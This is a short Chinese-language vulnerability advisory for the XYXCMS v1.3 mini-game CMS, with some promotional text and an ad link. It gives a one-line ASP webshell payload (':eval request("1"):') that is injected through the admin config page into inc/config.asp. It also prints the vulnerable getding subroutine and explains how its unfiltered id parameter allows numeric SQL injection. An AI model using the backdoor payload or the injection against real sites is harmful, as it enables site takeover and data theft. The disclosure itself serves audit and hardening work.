xyxcms v1.3 小游戏CMS 漏洞说明

国内领先的ASP小游戏网站内容管理系统：XYXCMS，助您高效搭建与管理游戏站点

如果您正在寻找一款能够轻松构建并管理小游戏网站的ASP内容管理系统，那么XYXCMS无疑是您的理想选择。作为一款专业的小游戏CMS，它在易用性、功能完备性以及管理效率方面均表现出色，显著领先于同类产品。无论是网站编辑、内容发布人员还是管理员，都可以通过这套系统直观地完成信息提交、内容修改、审核流程以及最终发布等全系列操作，极大提升了网站运营的便捷性。

免费影视、动漫、音乐、游戏、小说资源长期稳定更新！ 👉 点此立即查看 👈

[XYXCMS 小游戏内容管理系统]

当前版本：V1.3 正式版
程序大小：1.66M
最新更新：2010年8月6日
官方网站：http://www.xyxcms.com/
涉及文件：cms.asp

尽管这套ASP小游戏管理系统体积小巧，但在其发布时期拥有广泛的用户基础，因此在实际网络环境中依然可能遇到。需要郑重声明：所有技术分析与研究均应基于合法的授权与纯粹的学习目的，我们坚决反对利用系统漏洞进行非法挂马、篡改等破坏行为。以下内容仅供网络安全爱好者进行安全学习与防御技术参考，任何擅自将其用于非法途径的行为，均需自行承担全部法律责任。

后台权限提升与Webshell获取路径分析：

admin/admin_config.asp

在网站访问地址后尝试插入以下代码：:eval request("1"):'

关键漏洞代码段

漏洞核心文件：inc/config.asp （该文件内嵌有一句话后门代码）

act=request("action")
id=trim(request("id"))
................'此处省略部分中间代码
if act="getding" then call getding
....................'此处省略部分中间代码
sub getding
id=request("id") '关键安全漏洞：此处参数未经过任何安全过滤
set rs=server.createobject("adodb.recordset")
sql="select ding from flash where id="&id
rs.open sql,conn,1,1
if not rs.eof then
if isnull(rs(0)) then
response.Write(0)
else
response.Write(rs(0))
end if
else
response.Write(0)
end if
rs.close
set rs=nothing
end sub

通过代码审计可以清晰发现，在getding这个子程序过程中，直接使用了request("id")获取用户输入参数，完全没有进行SQL注入过滤等安全防护措施，从而构成了一个典型的数字型SQL注入漏洞。对于此类经典但存在历史遗留安全问题的ASP网站管理系统，进行全面的代码安全审计与及时的漏洞加固，是网站运维和安全防护工作中至关重要的一环。